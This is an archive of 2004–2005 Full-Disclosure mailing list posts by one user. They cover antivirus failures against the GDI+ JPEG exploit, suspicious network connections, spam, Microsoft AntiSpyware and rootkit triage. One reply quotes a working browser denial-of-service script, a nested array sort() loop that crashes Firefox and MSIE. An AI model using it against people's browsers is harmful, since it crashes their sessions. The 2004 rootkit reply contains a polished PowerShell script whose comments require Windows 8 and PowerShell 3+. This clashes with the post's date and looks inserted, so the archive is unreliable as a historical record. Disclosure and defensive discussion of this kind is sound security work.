[Full-Disclosure] RE: Full-Disclosure Digest, Vol 4, Issue 11

2005-03-05 Thread RandallM
 
Andrey,
Just to add to the concern you bring up: VirusTotal also shows the
detection failures.
http://www.virustotal.com/flash/graficas/grafica4_en.html

Of course for me that's job security but nonetheless it's pitiful. And now
in steps Microsoft with billions under its belt and I'll bet the odds
won't change much. That's where I get really confused.
We know that costs go into the billions when networks go down due to
infections. I know of no one but the parity actors for AOL who welcome
infections. I'm just dumbfounded by the abilities of virus companies to
battle this.

I'm finding that my preconceived label of who the virus writers are and what they look
like is rapidly being changed. I used to envision this lad with a tattered
Def Leppard shirt sitting with an old laptop in the wee early dawn finishing
up his code and getting ready to test it on the old grey Pentium box in the
corner.

Is this the guy beating the pants off the billion dollar companies?

I would also like to add that what you've done is very impressive. I'm
reading your paper now. I could not and will never be able to do such, so thanks for
this well written piece. Please tell me you're not wearing a Def Leppard
t-shirt!

thank you
Randall M

If we ever forget that we're one nation under God, then we will be a nation
gone under. 
- Ronald Reagan
_

 


Andrey so correctly acknowledged:
--

Message: 8
Date: Fri,  4 Mar 2005 15:03:10 -0600
From: Andrey Bayora [EMAIL PROTECTED]
Subject: [Full-Disclosure] Bypass of 22 Antivirus software with GDI+
bug exploit Mutations - part 2
To: full-disclosure@lists.netsys.com
Cc: bugtraq@securityfocus.com
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=ISO-8859-1


The first part is here:
http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html

First, this post isn't about how dangerous the GDI+ bug or a malicious JPEG
image is, but how good your antivirus software is.

The issue is: only 1 out of 23 tested antivirus software products can detect
the malicious JPEG image (6 months after the public disclosure date).

Here is the link to the results, the JPEG file and my paper (GCIH practical)
that describes how to create this one:
http://www.hiddenbit.org/jpeg.htm

This one vendor (Symantec) that can detect it obviously does it with
heuristic detection (I don't work for them and didn't send them any
file; moreover I know of cases when Symantec didn't detect a virus that
other vendors did).
ClamAV antivirus detected this JPEG file 4 months ago, but strangely
can't detect it now.
What happened?
What about the 22 antivirus software vendors that miss this malicious JPEG?
The pattern or problem in these JPEG files is known and still many
antivirus software vendors miss it; does this represent the quality of
their heuristic engines?

OK, we know that any antivirus software can provide 100% protection

P.S.  After my first post (October 14, 2004) about this problem, all
antivirus software vendors added detection for the demo file provided by
me in a couple of hours. Sadly for me, it seems that they prefer
playing cat and mouse and not improving heuristic engines.

Regards,
Andrey Bayora.
CISSP, GCIH

-

And so ends his thoughts




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Strange connection from google desktop search

2005-03-05 Thread RandallM
The following established connection was noticed:
 TCP  xxx.xxx.x.xx:2869  64.233.187.104:80  ESTABLISHED  2824

Process viewer reported it to be:
Googledesktop.exe

SamSpade says:

03/05/05 21:54:31 whois  64.233.187.104
I don't recognise any domain in 187.104, trying internic

whois -h whois.internic.net 187.104 ...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

No match for 187.104.

03/05/05 22:07:21 finger @ 64.233.187.104
finger @ 64.233.187.104 failed, no such host

03/05/05 22:07:47 dns  64.233.187.104
No DNS for this address
(host doesn't exist)



Have I been up too long with too much coffee, or is this strange? Or is this
because I have been playing around with the bulzano2.jpg!!!


thank you
Randall M

If we ever forget that we're one nation under God, then we will be a nation
gone under. 
- Ronald Reagan
_

 




[Full-Disclosure] Microsoft sure fire customer satisfaction

2005-03-02 Thread RandallM

___
Afraid Microsoft's anti-spyware will muck up your hard drive, erasing your
digital photos, music collection and work files?

Don't worry, you've got a $5 rebate coming your way in this worst-case
scenario--enough to buy five songs on iTunes. That is, if you read and take
advantage of Microsoft's legal promise.

Read more here: http://news.zdnet.com/2100-1009_22-5590042.html
___

thank you
Randall M
 




[Full-Disclosure] [Full Disclosure] RE: this IS FUN!!!!

2005-02-22 Thread RandallM
Jordan wrote:



[Full-Disclosure] this is fun?
Jordan Klein haplo at haplo.net 
Sun Feb 20 11:12:39 EST 2005 





I wouldn't call that fun.  It took my system to 100% cpu usage, spawned a 
ton of windows, and eventually caused firefox to crash.  I guess that crash 
was firefox's built-in protection mechanism against this type of DoS.  :-)

I haven't tried this with popup blocking enabled, since this is my work
machine, and I have to allow popups so our internal sites work.  (Damn, lazy
web developers...)

-- 
Jordan Klein ~  Beware of dragons
haplo at haplo.net  ~  for you are crunchy
UNIX System Administrator~  and go well with ketchup
- Original Message - 
From: Christian evilninja at gmx.net
To: full-disclosure at lists.netsys.com
Cc: Brandy Simon brandysimon at gmail.com
Sent: Sunday, February 20, 2005 7:51 AM
Subject: Re: [Full-Disclosure] this is fun?

}}

WOW! I had fun trying to capture the source page!!!






thank you
Randall M
 




[Full-Disclosure] Scan for IRC

2005-01-21 Thread RandallM
I am so sorry for interrupting the list. I'm trying to pick up IRC
communications on the network. I've made some filters for Ethereal and
Observer but can't seem to pick it up. I'm doing something wrong. Used the
6668-6669 ports. Any help? 
 
thank you
Randall M
 



[Full-Disclosure] Wide spread DSV

2005-01-16 Thread RandallM
 

Problem: Down Syndrome Virus (DSV)
Affected devices: Various web, internet, intranet and PC's.
Severity: DOA (Denial of Access).
Author: Ima Notserious 
Warnings: Elevated
Fix: At present no available fixes.

:
Overview:

Many users have been reporting various sites to be down.
This has a widespread effect and can be found
across the internet and intranets. The DSV has even been
reported to affect PCs and other devices.

::
Details:

Internet/Intranet: When user clicks on links or types in addresses
browsers hesitate then display 404 messages.
 
PC's: When power buttons are used to start PC, expected 
operating systems fail to load with various failed messages.

::
Reason for Elevated Warnings: 

The DSV was elevated due to the infection spreading to a PC.
A researcher found this after visiting one of the reported down sites. 
After reboot of PC, the PC failed to load. The site in question was
Amazon.COM.

::
Fix: 

At present researchers are conducting various tests to find out
how the DSV infects, the mechanism used to spread and
what if any fixes are available. It has been reported that the
possible spread is through port 25. At present some service providers
have begun to test this by blocking the port.

::
Workaround:

Do not visit any sites on the internet or intranets. Do not turn PCs off if you
have recently visited any sites on the Web.



Advisory by: WorldWideWatchers.Inc
Copyright (c) 2004 WWW.Inc




[Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail

2005-01-11 Thread RandallM
Have been getting a number of these come through also at work.
Of course all the users are asking me questions about these.
They all have the strange words, paragraphs, and questions like this one.
They really got my attention. I at first thought they were hidden messages
but not so, as the ones we receive come as text.

thank you
Randall M
 
 

|--
|
|Message: 4
|Date: Tue, 11 Jan 2005 02:27:55 +
|From: DAN MORRILL [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Interesting but suspicious possible
| phishing mail
|To: full-disclosure@lists.netsys.com
|Message-ID: [EMAIL PROTECTED]
|Content-Type: text/plain; format=flowed
|
|Hi folks,
|
|Got this really interesting mail in my box today, and 
|knowing that I haven't 
|used that e-mail address or ordered anything on line lately. 
|Wondering if it 
|might not be a phishing e-mail. Haven't seen anything like 
|this before. 
|Anyone see anything similar?
|r/
|Dan
|
|
|
|from :  Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|Sent :  Monday, January 10, 2005 10:40 PM
|To :  Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
|[EMAIL PROTECTED], [EMAIL PROTECTED]
|Subject :  Shipping Notification, Tracking Number : 
|TCD461649887242ESB
|
|MIME-Version: 1.0
|Received: from msnmail2.uswest.net ([63.226.138.22]) by 
|mc10-f38.hotmail.com 
|with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
|Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from unknown (63.226.138.18) by 
|msnmail2.uswest.net with QMQP; 10 
|Jan 2005 22:45:55 -
|Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
|mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
|X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
|Delivered-To: [EMAIL PROTECTED]
|X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
|Fuz1=4Fuz2=4
|Return-Path: [EMAIL PROTECTED]
|X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) 
|FILETIME=[24BA71E0:01C4F766]
|
|
|
|
|Content-Type: multipart/mixed; 
|boundary=-mpls-cmx-12.inet.qwest.net-1105397155-56110
|
|
|Content-Type: text/plain
|
|
|This email was forwarded from your previous Qwest.net email address
|to your MSN email address.  To discontinue email forwarding for any
|future emails sent to your previous Qwest.net email address, please
|contact MSN Customer Service.
|
|
|
|
|
|Content-Type: message/rfc822
|Content-Description: forwarded message
|Content-Transfer-Encoding: 8bit
|Content-Disposition: inline
|
|
|From: Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|To: Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
|[EMAIL PROTECTED], 
|[EMAIL PROTECTED]
|Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
|Sent: Monday, January 10, 2005 10:40 PM
|MIME-Version: 1.0
|Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
|mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
|X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
|Fuz1=4Fuz2=4 Content-Type: multipart/alternative; 
|boundary=--Part_GRKDac7J6.oMXawOLoYO4
|
|
|Content-Type: text/html; format=flowed; charset=iso-8859-15
|Content-Transfer-Encoding: quoted-printable
|
|Check your status Below:
|
|cov2pa.com/track.asp?cg=1c=tc
|
|The illiterate of the 21st century will not be those who 
|cannot read and 
|write, but those who cannot learn, unlearn, and relearn. 
|Alvin Toffler
|Those police officers are practicing driving between the two 
|buildings.
|The illiterate of the 21st century will not be those who 
|cannot read and 
|write, but those who cannot learn, unlearn, and relearn. 
|Alvin Toffler
|Haven't the photographers already disliked praying?
|Few things are harder to put up with than the annoyance of a 
|good example.
|3
|When people are free to do as they please, they usually 
|imitate each other. 
|-Eric Hoffer (1902-1983)
|Have you already loved sleeping?
|



[Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-08 Thread RandallM


On Thu, 6 Jan 2005, James Patterson Wicks wrote:
 While this was just a quick test to satisfy my curiosity about the
 Microsoft tool, my initial feeling is that the Microsoft AntiSpyware is
 worth a test deployment in the office.  This beta expires in July.
 Hopefully the final version will be free and allow for centralized
 domain management.  It's the least that Microsoft can do.
 
I don't think it's going to be free. While doing a small amount of research
on the spyware community I found this text string in
GiantAntiSpywareUpdater.exe:
 
Because your Microsoft AntiSpyware subscription has expired, needed spyware
definitions could NOT be downloaded and installed. Your definitions should
be updated as soon as possible to prevent spyware infections. Your Microsoft
AntiSpyware Subscription has Expired
 
And within the gcASNotice.exe
 
We hope your trial went well. Unfortunately you are now no longer protected
from the growing dangers of spyware, worms and trojans. Continue to keep
your self protected, purchase the full version today with a full money back
guarantee.
 
I also have been a bit curious concerning the user community and the way
this type of software updates, whether or not they can be exploited this
way.
 
Now I would like to RANT a bit here. After picking myself up off the floor
from reading this I chose to post this. The primary reason most spyware and
trojans get unauthorized access to my computer is because of my blind
trust in the products I use. One such product was a browser embedded in the
operating system I own. To rid myself of such unauthorized accesses I had to
educate myself and find software to do it. Most of them are freely developed
(God Bless Them Each and Everyone). Along comes a program to do this, owned by
the operating system and products I use. I was happy and thought, who would
be better equipped to do such than the owners themselves. After all they
wrote and know all the programming of it. They can surely protect it.
According to the above text scans of this product I have to pay them to
defend what they allowed. It's a strange, strange world after all.
 
I don't want to sound condescending but, if this is the case, this company's
software needs some humility lessons brought to them through heavy
exploitation of such software. On the other hand, if such a company would
provide this as a service to me, then they need a community helping hand.
 
thank you
Randall M
 



Re: [Full-Disclosure] Microsoft AntiSpyware - First Impression

2005-01-08 Thread RandallM
KF (lists) wrote:
 

Message: 11
Date: Fri, 07 Jan 2005 11:19:56 -0500
From: KF (lists) [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Microsoft AntiSpyware - First
Impressions
To: full-disclosure@lists.netsys.com
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=windows-1252; format=flowed

Do a software update check with this thing and you get 
GIANTAntiSpywareMain.exe  listening on port 2571 until the software is 
closed. Feel free to beat on and fuzz that port fellas. =]
-KF



I found this with tcpview:
 
 
GIANTAntiSpywareMain.exe:3424 TCP p4fast..com:3256 216.32.240.26:http
ESTABLISHED 
GIANTAntiSpywareMain.exe:3424 UDP p4fast:3255 *:*  

OrgName:Savvis 
OrgID:  SAVVI-2
Address:3300 Regency Parkway
City:   Cary
StateProv:  NC
PostalCode: 27511
Country:US

ReferralServer: rwhois://rwhois.exodus.net:4321/

NetRange:   216.32.0.0 - 216.35.255.255 
CIDR:   216.32.0.0/14 
NetName:SAVVIS
NetHandle:  NET-216-32-0-0-1
Parent: NET-216-0-0-0-0
NetType:Direct Allocation
NameServer: DNS01.SAVVIS.NET
NameServer: DNS02.SAVVIS.NET
NameServer: DNS03.SAVVIS.NET
NameServer: DNS04.SAVVIS.NET
Comment:
RegDate:1998-07-30
Updated:2004-10-07


GET / HTTP/1.1
Host: 216.32.240.26
Connection: close
User-Agent: Sam Spade 1.14

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Date: Sat, 08 Jan 2005 16:40:07 GMT
Connection: close

If you look at, for instance, the system process or BHO area and select an unknown,
an option to send it to SpyNet for analysis is there. If you select this, it
reports to the 216.31.240.26 also.

On a funny note, under the ActiveX area it lists the Microsoft update as this:

Microsoft Windows Update Control Engine
This is an unknown ActiveX

File path: C:\WINDOWS\System32\iuengine.dll
Description: Windows Update Control Engine
Publisher: Microsoft Corporation
Last modified: Tue, 26 Aug 2003 01:19:52 GMT
Installed version: 5,4,3790,14
Download location:
http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37921.827546
2963

It does look as if they jumped very quickly to launch this software!


 
thank you
Randall M
 



RE: [Full-Disclosure] FIREFOX flaws: nested array sort()

2004-11-25 Thread RandallM
 
So, where do you all stand. Exploit for fame or for purpose?

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Berend-Jan Wever
 Sent: 25 November 2004 01:05
 To: [EMAIL PROTECTED]; 
 [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() 
 loop Stack overflow exception
 
 Hi all,
 
 Same flaw works for Firefox as well as MSIE:
 
 <HTML>
   <SCRIPT>a = new Array(); while (1) { (a = new Array(a)).sort(); }</SCRIPT>
   <SCRIPT>a = new Array(); while (1) { (a = new Array(a)).sort(); }</SCRIPT>
 </HTML>
 
 Added to the list: 
 http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
 
 I'd have loved to CC mozilla about this, but I didn't have 
 the time to do the crash course how to write a bug report 
 and go through all that bugzilla crap.
 
 Cheers,
 SkyLined
 http://www.edup.tudelft.nl/~bjwever



Randall M
 




[Full-Disclosure] How the hell can we CAN SPAM??

2004-11-17 Thread RandallM
It's just getting ridiculous, not to mention what it costs all of us in the
end. And might I add it doesn't make sense. I mean, they spam selling something
with no real contact but a spoofed one or a real website to reach (most of
the time). I placed a web appliance at my workplace and catch an average
of 52000 in 7 days. My ISP has spam filters yet I still receive a number a
day. Now I am also the return-to-sender because of email spoofing. I get
about 40-50 returned-to-sender or can't-deliver emails (not to mention what
my ISP catches). There is not a damn thing I can do about it.

Let me add to this the problem for legit companies who have this done to them
and are placed on the blacklist. They are victims of this abuse that
causes undue problems with their business affairs and it backlashes onto their
clients. I often have to help fight for some of our clients who have been
victimized this way. They are not spammers but their addresses have been
spoofed and blacklisted and now any client who uses a spam blacklist blocks
their legit address and misses their business correspondence.

As for myself I am stuck with the pain of removing my email and setting up
another one and the pain of contacting all correspondents who have that one
to change it to the new one, etc., etc.

Or I could attempt to figure out the real senders, send abuse email out and
hope someone would answer and help. Doubt that would work. 

Example:
_-
Date: Wed, 17 Nov 2004 12:12:27 +
From: Mail Delivery System [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Mail delivery failed: returning message to sender

This message was created automatically by mail delivery software (Exim).
A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:
  [EMAIL PROTECTED]
    unknown local-part byoder in domain bt.net

-- This is a copy of the message, including all the headers. --
Return-path: <[EMAIL PROTECTED]>
Received: from [217.35.209.184] (helo=insmtp22.bt.net)
    by insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1)
    id 1CUOfh-000628-00
    for [EMAIL PROTECTED]; Wed, 17 Nov 2004 12:12:25 +
Received: from [211.186.238.119] (helo=therightmoment.com)
    by insmtp22.bt.net with smtp (Exim 3.36 #1)
    id 1CUOTM-00043p-00
    for [EMAIL PROTECTED]; Wed, 17 Nov 2004 11:59:40 +
Received: from fidnet.com (fidnet.com.mail5.psmtp.com [64.18.5.10])
    by therightmoment.com (Postfix) with ESMTP id 3097F4FF8C
    for <[EMAIL PROTECTED]>; Wed, 17 Nov 2004 06:09:31 -0600
Message-ID: <[EMAIL PROTECTED]>
From: Tickled B. Pulsar <[EMAIL PROTECTED]>
To: Byoder <[EMAIL PROTECTED]>
Subject: =?iso-8859-1?B?VmFyaW91cyBQaWxscywgTG93IHJhdGVzLCBtb25leWJhY2sgZ3VhcmFu?=
    =?iso-8859-1?B?dGVlISA=?=
Date: Wed, 17 Nov 2004 06:09:31 -0600
MIME-Version: 1.0
Content-Type: multipart/alternative; charset=iso-8859-1;
    boundary==_NextPart_000_0005_DDA5806C.B53BEAE9
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006
___

The email message that was enclosed with these headers was complete
nonsense, full of meaningless verbiage like:

__-
TBODY  TR  TD bgColor=3d#99 height=3d22  DIV align=3dcenterSPAN
class=3dstyle13Once something becomes di= scernible, or understandable, we
no longer need to repeat it=2e We can de= stroy
it=2e/SPAN/DIV/TD/TR/TBODY/TABLE TABLE cellSpacing=3d0
cellPadding=3d0 width=3d100% border=3d0  TBODY
__

We talk about the scare of government control. Someone then tell me who else
has the power to step in and stop the viruses and spam. Who else has the money
to back massive countermeasures to put a stop to it all. Am I just being
too critical and a doom-and-gloom user?

FYI:
Yes I have ensured that I'm not zombified. I then tested again by turning
off my internet use for two days and still received returns for those days.
I clean machines for things like this for a living. Thanks for asking.
 
thank you
Randall M
 



[Full-Disclosure] Securing My Mobile users

2004-11-13 Thread RandallM
I'm attempting to find some simple free programs that will help secure my
mobile users. Simple because anything above sitting in the tray will confuse
them. I'm testing this on a computer that is XP2 patched, with McAfee 80 which
has file-creation-type protection, Google blocker, Spybot and the Prevx
protection system program.
 
A little program called pcAudit which claims to act like a hacker
intervention has you do a few things then sends the information to their
server and creates a report for you to view. The report show what you typed
in the browser or program you used, shows what's in your documents folder,
and takes a snapshot of your desktop.
 
The settings I ended with were to prevent creation of .dll files in the system
and system32 folders, and to prevent unwanted programs, key loggers, etc., in McAfee.
I did not do anything with the XP firewall and kept Prevx at defaults.
 
Each time, pcAudit could show the same results even if the .dll was
prevented from being created. It still gave the snapshots, the documents folder
and reported what I typed.
 
What I'm seeing here is that the simplest settings that can be allowed
have no protection. The mobile salesperson can't and refuses to be bothered
with any more than this. If this simple program could do that, my users
are doomed if they click on a link and a more malicious program is
loaded.

Has anyone here examined this pcAudit program? Can they explain what makes
it tick? 
 
thank you
Randall M
 



[Full-Disclosure] RE: Norton AntiVirus Script Blocking Exploit -- Symantec's response

2004-11-11 Thread RandallM
Daniel,
Man, that was just awesome! Enjoyed the movie and the popcorn! Like to see
more PoC like that!!

thank you
Randall M





RE: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)

2004-11-06 Thread RandallM


Daniel told me:
--__--__--


Message: 4
Date: Wed, 03 Nov 2004 20:09:02 -0500
From: Daniel Milisic [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting
Vulnerability Pt.3 (Includes PoC VBScript Code)

Hi All, I have major issues with the quality of Norton AntiVirus.
For some history, see:
http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html - Norton
AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)
http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html - Norton
AntiVirus 2004/2005 Script Blocking Redux

Symantec's Response to this issue (from a week ago):
"ScriptBlocking is intended to provide proactive detection against
script-based worms and this component of Norton AntiVirus has been
effective at doing this since its introduction in 2001"

Huh? Below is a 'typical' script-based virus that Norton AntiVirus will
allow a user to run, without *any* intervention on NAV's part whatsoever.
It's likely that code similar to this is already appended to script-based
threats/worms to assist their penetration in the wild.

--__--__--
 
Damn. McAfee picked it right up as viral.


thank you
Randall M
 



[Full-Disclosure] Gmail fixed

2004-11-02 Thread RandallM
6. Google blocks Gmail exploit

By: John Leyden, The Register

Google has fixed a flaw in its high-profile webmail service, Gmail, which
created a possible route for hackers to gain full access to a user's email
account simply by knowing their user name.

http://www.securityfocus.com/news/9843

 

P.S.
Anyone else on this list been a victim of email spoofing lately? An old
account (non-default) of mine is being used and I'm receiving about 20-30
returned emails (and I mean spoofed email headers).

thank you
Randall M
 



RE: [Full-Disclosure] Help, possible rootkit

2004-10-24 Thread RandallM
Billy said:

--__--__--

Message: 1
From: BillyBob [EMAIL PROTECTED]
To: Full Disclosure [EMAIL PROTECTED]
Date: Sat, 23 Oct 2004 13:05:29 -0300
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.

-- -- --
 __ __


Billy,
1. Go directly to safe mode
2. Go to regedit and check the startup processes for the computer and the user, and
research each unfamiliar one
3. Run the HijackThis program
4. Run Spybot
5. Upon startup use TCPView and Process Viewer from sysinternals.com to see
connections

One person made mention of this once when I had this problem on a sales
laptop:

If you have scripting enabled, it is possible that one of them is doing
this in the background.  Scripts can remain active after you have left
the page that started them.

Some PC programmers tend to use busy waits instead of calling a 
sleep() or hibernate() function.  This tends to kill performance on 
multiuser systems.

Optical mice also don't work well with certain colored pads and such. Make
sure you try a different surface.

Also of course clean the area very well. A piece of hair can cause problems.

Just some quick thoughts
 


thank you
Randall M
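Steps 2 and 5 of the checklist above (autostart entries for machine and user, then live connections mapped back to the process that owns them) can be collected in one pass and saved for comparison. The script below is an added example, not code from the original post or from HijackThis, Spybot, TCPView or Process Viewer. It assumes Windows 8 / Server 2012 or later with PowerShell 3+ (for Get-NetTCPConnection), an elevated prompt so HKLM and every process are readable, and a report path under $env:TEMP that is an arbitrary choice.

```powershell
# Added example (not from the original post or any tool it names).
# Assumes Windows 8 / Server 2012+ with PowerShell 3+, run elevated.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Pull the image out of a Run value such as
#   "C:\Program Files\Foo\foo.exe" /tray      or      C:\tools\bar.exe -x
# Bare names like rundll32.exe are resolved through PATH with Get-Command.
function Get-CommandImage([string]$command) {
    $command = $command.Trim()
    if ($command.StartsWith('"')) {
        $end = $command.IndexOf('"', 1)
        $image = if ($end -gt 1) { $command.Substring(1, $end - 1) } else { $command.Trim('"') }
    } else {
        $image = ($command -split ' ')[0]
    }
    if ($image -and -not (Test-Path -LiteralPath $image)) {
        $resolved = Get-Command $image -ErrorAction SilentlyContinue
        if ($resolved) { $image = $resolved.Source }
    }
    return $image
}

# Step 2: every Run/RunOnce value for machine and current user, with the
# Authenticode status of the image it launches. NotSigned, HashMismatch and
# FileMissing are the entries to research first.
function Get-AutostartEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $values = Get-ItemProperty -Path $key
        foreach ($p in $values.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata, not a Run value
            $image = Get-CommandImage ([string]$p.Value)
            $status = if ($image -and (Test-Path -LiteralPath $image)) {
                (Get-AuthenticodeSignature -FilePath $image).Status
            } else { 'FileMissing' }
            [pscustomobject]@{
                Key       = $key
                Name      = $p.Name
                Command   = [string]$p.Value
                Image     = $image
                Signature = $status
            }
        }
    }
}

# Step 5: established TCP connections mapped to the owning process and its
# image path, the same view TCPView gives.
function Get-ProcessConnections {
    Get-NetTCPConnection -State Established | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Local   = '{0}:{1}' -f $_.LocalAddress, $_.LocalPort
            Remote  = '{0}:{1}' -f $_.RemoteAddress, $_.RemotePort
            PID     = $_.OwningProcess
            Process = if ($proc) { $proc.ProcessName } else { '<exited>' }
            Path    = if ($proc) { $proc.Path } else { $null }
        }
    }
}

# Usage: show both tables and keep a copy to diff against a known-clean machine.
$autostarts  = Get-AutostartEntries
$connections = Get-ProcessConnections
$autostarts  | Sort-Object Signature | Format-Table Name, Signature, Image -AutoSize
$connections | Sort-Object Process   | Format-Table -AutoSize
$report = Join-Path $env:TEMP 'triage-report.txt'   # arbitrary location
($autostarts | Format-List | Out-String) + ($connections | Format-Table -AutoSize | Out-String) |
    Set-Content -Path $report
```

Sorting on Signature floats the unsigned and missing entries to the top, which is the "research each unfamiliar" step done mechanically instead of from memory, and diffing the saved report against one taken from a clean build of the same image is far quicker than eyeballing regedit. One caveat that fits the thread's rootkit worry: a kernel-mode rootkit can lie to user-mode enumeration, so this output should agree with what the same keys show when the disk is examined from safe mode or offline; a mismatch between the two views is itself a finding.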
 



[Full-Disclosure] Senior M$ member says stop using passwords completely!

2004-10-16 Thread RandallM
 http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx
 
thank you
Randall M
 
 



[Full-Disclosure] Your daily internet traffic report

2004-10-16 Thread RandallM
 
Router               Location         Index
router1.iust.ac.ir   Iran (Tehran)    29

Which one of you is attacking Iran?
http://www.internettrafficreport.com/asia.htm 
 
thank you
Randall M
 



RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!

2004-10-16 Thread RandallM
I did. He said stop using passwords. I'm not flaming, I was passing on an
article.

thank you
Randall M
 
 

|-Original Message-
|From: Aviv Raff [mailto:[EMAIL PROTECTED] 
|Sent: Saturday, October 16, 2004 10:19 AM
|To: 'RandallM'; [EMAIL PROTECTED]
|Subject: RE: [Full-Disclosure] Senior M$ member says stop 
|using passwords completely!
|
|
|No...
|Senior Microsoft member says: use passPHRASES instead of passWORDS.
|
|You should read the article before you start flaming.
|
|-- Aviv. 
|
|-Original Message-
|From: [EMAIL PROTECTED]
|[mailto:[EMAIL PROTECTED] On Behalf Of RandallM
|Sent: Saturday, October 16, 2004 3:14 PM
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Senior M$ member says stop using 
|passwords completely!
|
|
| 
|http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx
| 
|thank you
|Randall M
| 
|
|



[Full-Disclosure] (no subject)

2004-10-14 Thread RandallM
Oh my Gawd! I think I've fallen in love! You will be hearing from me soon!
 
--__--__--

Message: 4
Date: Wed, 13 Oct 2004 10:28:40 -0700 (MST)
From: Jay Jacobson [EMAIL PROTECTED]
To: Mr. Rufus Faloofus [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Nessus experience

SNIP

Of course, another good place for these questions would be the Nessus 
mailing list. You may also want to check out Edgeos' Nessus Knowledge 
Base, which documents every configuration option in Nessus 
http://www.edgeos.com/nessuskb/.

-- 
..
..  Jay Jacobson
..  Edgeos, Inc. - 480.961.5996 - http://www.edgeos.com
..
..  Network Security Auditing and
..  Vulnerability Assessment Managed Services
..


--__--__--
 
thank you
Randall M
 



RE: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs

2004-10-07 Thread RandallM
GuidoZ
Didn't mean to have you apologize, it did its job. It showed
that I was not vulnerable. I just found it interesting that my
AV called it something that could not be found through search.

thank you
Randall M
 
 

|-Original Message-
|From: GuidoZ [mailto:[EMAIL PROTECTED] 
|Sent: Thursday, October 07, 2004 1:16 AM
|To: RandallM
|Cc: [EMAIL PROTECTED]
|Subject: Re: [Full-Disclosure] RE: Full-Disclosure digest, 
|Vol 1 #1955 - 19 msgs
|
|It might be detected as Trojan.Moo or any other variant of 
|the JPEG exploit. As I said, it attempts to exploit the 
|system to see if it's vulnerable, using an infected JPG. 
|The file I provided is simply a SFX with a batch file and 
|the infected JPG (named exploit.bak). No attempt has been 
|made at all to mask what's inside.
|
|I figured those that would want to use it would either not 
|worry about the virus warnings, or not get them at all and 
|REALLY need the fix it helps provide. =) Email me at the 
|address provided in my original email (exploit _AT_ guidoz 
|_DOT_ com) and I'll provide a link to the batch files and 
|such so you may modify them as you wish.
|
|Sorry for any confusion with the AV. I should have warned 
